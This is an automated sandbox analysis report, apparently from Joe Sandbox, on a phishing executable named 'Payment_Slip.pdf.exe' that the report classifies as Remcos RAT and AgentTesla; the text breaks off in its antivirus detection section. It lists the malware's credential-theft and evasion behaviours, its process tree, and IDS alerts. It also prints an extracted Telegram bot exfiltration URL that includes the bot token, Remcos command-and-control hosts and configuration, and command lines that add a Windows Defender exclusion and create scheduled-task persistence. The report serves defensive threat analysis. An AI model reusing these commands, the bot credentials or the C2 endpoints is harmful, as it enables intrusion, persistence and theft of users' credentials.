Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Slip.pdf.exe

Overview

General Information

Sample name:Payment_Slip.pdf.exe
Analysis ID:1639467
MD5:90133947ec6add62c5d9b23c475f602f
SHA1:7cf9a2a412aa3bb5f78f19ba419551faad4758f2
SHA256:a35234d3e33acbb7e53abaec38ced3a45f6df0ad5ee17ba52b49478d0418f1da
Tags:exeuser-BastianHein
Infos:

Detection

Remcos, AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates multiple autostart registry keys
Delayed program exit found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment_Slip.pdf.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\Payment_Slip.pdf.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)
    • powershell.exe (PID: 8180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7200 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment_Slip.pdf.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Payment_Slip.pdf.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)
      • host.exe (PID: 4860 cmdline: "C:\Users\user\AppData\Roaming\host.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)
      • conserver.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\conserver.exe" MD5: CF397453A71790C27900FD457D4764C3)
      • Payment_Slip.pdf.exe (PID: 6592 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv" MD5: 90133947EC6ADD62C5D9B23C475F602F)
      • Payment_Slip.pdf.exe (PID: 7272 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn" MD5: 90133947EC6ADD62C5D9B23C475F602F)
      • Payment_Slip.pdf.exe (PID: 7200 cmdline: C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs" MD5: 90133947EC6ADD62C5D9B23C475F602F)
      • dwn.exe (PID: 7300 cmdline: "C:\Users\user\AppData\Local\Temp\dwn.exe" MD5: E3AE2634B39F83C9218977B5F3539E58)
  • mHTmhPhJy.exe (PID: 7856 cmdline: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe MD5: 90133947EC6ADD62C5D9B23C475F602F)
    • schtasks.exe (PID: 1944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mHTmhPhJy.exe (PID: 5392 cmdline: "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" MD5: 90133947EC6ADD62C5D9B23C475F602F)
  • svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Windows Update.exe (PID: 8368 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe" MD5: CF397453A71790C27900FD457D4764C3)
  • mykksg.exe (PID: 8492 cmdline: "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)
  • Windows Update.exe (PID: 8628 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe" MD5: CF397453A71790C27900FD457D4764C3)
  • mykksg.exe (PID: 8792 cmdline: "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe" MD5: ACCFB066306C95FEA0ED42DC99DF1634)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendMessage?chat_id=5559571239"}
{"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Roaming\host.exeJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        C:\Users\user\AppData\Roaming\mykksg\mykksg.exeJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          C:\Users\user\AppData\Local\Temp\conserver.exeJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            C:\Users\user\AppData\Local\Temp\conserver.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        Click to see the 65 entries
                        SourceRuleDescriptionAuthorStrings
                        12.0.host.exe.240000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                          13.0.conserver.exe.d70000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                            13.0.conserver.exe.d70000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                              13.0.conserver.exe.d70000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
                              • 0x30161:$a13: get_DnsResolver
                              • 0x2e980:$a20: get_LastAccessed
                              • 0x30adf:$a27: set_InternalServerPort
                              • 0x30e13:$a30: set_GuidMasterKey
                              • 0x2ea87:$a33: get_Clipboard
                              • 0x2ea95:$a34: get_Keyboard
                              • 0x2fd94:$a35: get_ShiftKeyDown
                              • 0x2fda5:$a36: get_AltKeyDown
                              • 0x2eaa2:$a37: get_Password
                              • 0x2f544:$a38: get_PasswordHash
                              • 0x30561:$a39: get_DefaultCredentials
                              13.0.conserver.exe.d70000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                              • 0x32a2d:$s10: logins
                              • 0x32494:$s11: credential
                              • 0x2ea87:$g1: get_Clipboard
                              • 0x2ea95:$g2: get_Keyboard
                              • 0x2eaa2:$g3: get_Password
                              • 0x2fd84:$g4: get_CtrlKeyDown
                              • 0x2fd94:$g5: get_ShiftKeyDown
                              • 0x2fda5:$g6: get_AltKeyDown
                              Click to see the 44 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", CommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Payment_Slip.pdf.exe, NewProcessName: C:\Users\user\Desktop\Payment_Slip.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ProcessId: 8060, ProcessName: Payment_Slip.pdf.exe
                              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\conserver.exe, ProcessId: 8164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", ProcessId: 8180, ProcessName: powershell.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\host.exe, ProcessId: 4860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mykksg
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", ProcessId: 8180, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe, ParentImage: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe, ParentProcessId: 7856, ParentProcessName: mHTmhPhJy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp", ProcessId: 1944, ProcessName: schtasks.exe
                              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.102.1.109, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\conserver.exe, Initiated: true, ProcessId: 8164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", ProcessId: 7200, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe", ProcessId: 8180, ProcessName: powershell.exe
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 60, ProcessName: svchost.exe

                              Persistence and Installation Behavior

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Slip.pdf.exe", ParentImage: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ParentProcessId: 8060, ParentProcessName: Payment_Slip.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp", ProcessId: 7200, ProcessName: schtasks.exe

                              Stealing of Sensitive Information

                              barindex
                              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Payment_Slip.pdf.exe, ProcessId: 7544, TargetFilename: C:\ProgramData\remcos\logs.dat
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-15T17:06:12.938453+010020365941Malware Command and Control Activity Detected192.168.2.449720103.186.117.2289373TCP
                              2025-03-15T17:06:15.079073+010020365941Malware Command and Control Activity Detected192.168.2.449721103.186.117.2289373TCP
                              2025-03-15T17:06:15.094713+010020365941Malware Command and Control Activity Detected192.168.2.449723103.186.117.2289373TCP
                              2025-03-15T17:06:15.104722+010020365941Malware Command and Control Activity Detected192.168.2.449724103.186.117.2289373TCP
                              2025-03-15T17:06:15.125955+010020365941Malware Command and Control Activity Detected192.168.2.449722103.186.117.2289373TCP
                              2025-03-15T17:06:15.141592+010020365941Malware Command and Control Activity Detected192.168.2.449725103.186.117.2289373TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-15T17:06:21.563582+010028517791Malware Command and Control Activity Detected192.168.2.449733149.154.167.220443TCP
                              2025-03-15T17:06:43.564030+010028517791Malware Command and Control Activity Detected192.168.2.449743149.154.167.220443TCP
                              2025-03-15T17:08:09.380755+010028517791Malware Command and Control Activity Detected192.168.2.449753149.154.167.220443TCP
                              2025-03-15T17:09:04.422073+010028517791Malware Command and Control Activity Detected192.168.2.449762149.154.167.220443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-15T17:06:21.563582+010028528151Malware Command and Control Activity Detected192.168.2.449733149.154.167.220443TCP
                              2025-03-15T17:06:22.804583+010028528151Malware Command and Control Activity Detected192.168.2.449735149.154.167.220443TCP
                              2025-03-15T17:06:43.564030+010028528151Malware Command and Control Activity Detected192.168.2.449743149.154.167.220443TCP
                              2025-03-15T17:06:44.775521+010028528151Malware Command and Control Activity Detected192.168.2.449744149.154.167.220443TCP
                              2025-03-15T17:06:59.608734+010028528151Malware Command and Control Activity Detected192.168.2.449749149.154.167.220443TCP
                              2025-03-15T17:08:09.248035+010028528151Malware Command and Control Activity Detected192.168.2.449754149.154.167.220443TCP
                              2025-03-15T17:08:09.380755+010028528151Malware Command and Control Activity Detected192.168.2.449753149.154.167.220443TCP
                              2025-03-15T17:08:19.385055+010028528151Malware Command and Control Activity Detected192.168.2.449755149.154.167.220443TCP
                              2025-03-15T17:08:26.141853+010028528151Malware Command and Control Activity Detected192.168.2.449757149.154.167.220443TCP
                              2025-03-15T17:08:45.831676+010028528151Malware Command and Control Activity Detected192.168.2.449759149.154.167.220443TCP
                              2025-03-15T17:08:47.708090+010028528151Malware Command and Control Activity Detected192.168.2.449761149.154.167.220443TCP
                              2025-03-15T17:09:04.128726+010028528151Malware Command and Control Activity Detected192.168.2.449763149.154.167.220443TCP
                              2025-03-15T17:09:04.422073+010028528151Malware Command and Control Activity Detected192.168.2.449762149.154.167.220443TCP
                              2025-03-15T17:09:31.210081+010028528151Malware Command and Control Activity Detected192.168.2.449764149.154.167.220443TCP
                              2025-03-15T17:10:01.964448+010028528151Malware Command and Control Activity Detected192.168.2.449765149.154.167.220443TCP
                              2025-03-15T17:10:24.624770+010028528151Malware Command and Control Activity Detected192.168.2.449767149.154.167.220443TCP
                              2025-03-15T17:10:24.667128+010028528151Malware Command and Control Activity Detected192.168.2.449769149.154.167.220443TCP
                              2025-03-15T17:10:24.930905+010028528151Malware Command and Control Activity Detected192.168.2.449771149.154.167.220443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-15T17:06:14.852680+010028033043Unknown Traffic192.168.2.449726178.237.33.5080TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-15T17:06:21.393517+010018100081Potentially Bad Traffic192.168.2.449733149.154.167.220443TCP
                              2025-03-15T17:06:22.552864+010018100081Potentially Bad Traffic192.168.2.449735149.154.167.220443TCP
                              2025-03-15T17:06:43.393252+010018100081Potentially Bad Traffic192.168.2.449743149.154.167.220443TCP
                              2025-03-15T17:06:44.526096+010018100081Potentially Bad Traffic192.168.2.449744149.154.167.220443TCP
                              2025-03-15T17:06:59.352727+010018100081Potentially Bad Traffic192.168.2.449749149.154.167.220443TCP
                              2025-03-15T17:08:09.202013+010018100081Potentially Bad Traffic192.168.2.449753149.154.167.220443TCP
                              2025-03-15T17:08:09.246002+010018100081Potentially Bad Traffic192.168.2.449754149.154.167.220443TCP
                              2025-03-15T17:08:19.384216+010018100081Potentially Bad Traffic192.168.2.449755149.154.167.220443TCP
                              2025-03-15T17:08:26.140935+010018100081Potentially Bad Traffic192.168.2.449757149.154.167.220443TCP
                              2025-03-15T17:08:45.824418+010018100081Potentially Bad Traffic192.168.2.449759149.154.167.220443TCP
                              2025-03-15T17:08:47.705370+010018100081Potentially Bad Traffic192.168.2.449761149.154.167.220443TCP
                              2025-03-15T17:09:04.121542+010018100081Potentially Bad Traffic192.168.2.449762149.154.167.220443TCP
                              2025-03-15T17:09:04.127924+010018100081Potentially Bad Traffic192.168.2.449763149.154.167.220443TCP
                              2025-03-15T17:09:31.205547+010018100081Potentially Bad Traffic192.168.2.449764149.154.167.220443TCP
                              2025-03-15T17:10:01.963032+010018100081Potentially Bad Traffic192.168.2.449765149.154.167.220443TCP
                              2025-03-15T17:10:24.616571+010018100081Potentially Bad Traffic192.168.2.449767149.154.167.220443TCP
                              2025-03-15T17:10:24.661084+010018100081Potentially Bad Traffic192.168.2.449769149.154.167.220443TCP
                              2025-03-15T17:10:24.930360+010018100081Potentially Bad Traffic192.168.2.449771149.154.167.220443TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeAvira: detection malicious, Label: TR/Spy.Gen8
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeAvira: detection malicious, Label: TR/Spy.Gen8
                              Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["ratianaana701.bounceme.net:9373:1", "milala.duckdns.org:9373:1"], "Assigned name": "MARCH 15", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-TWFFFD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", 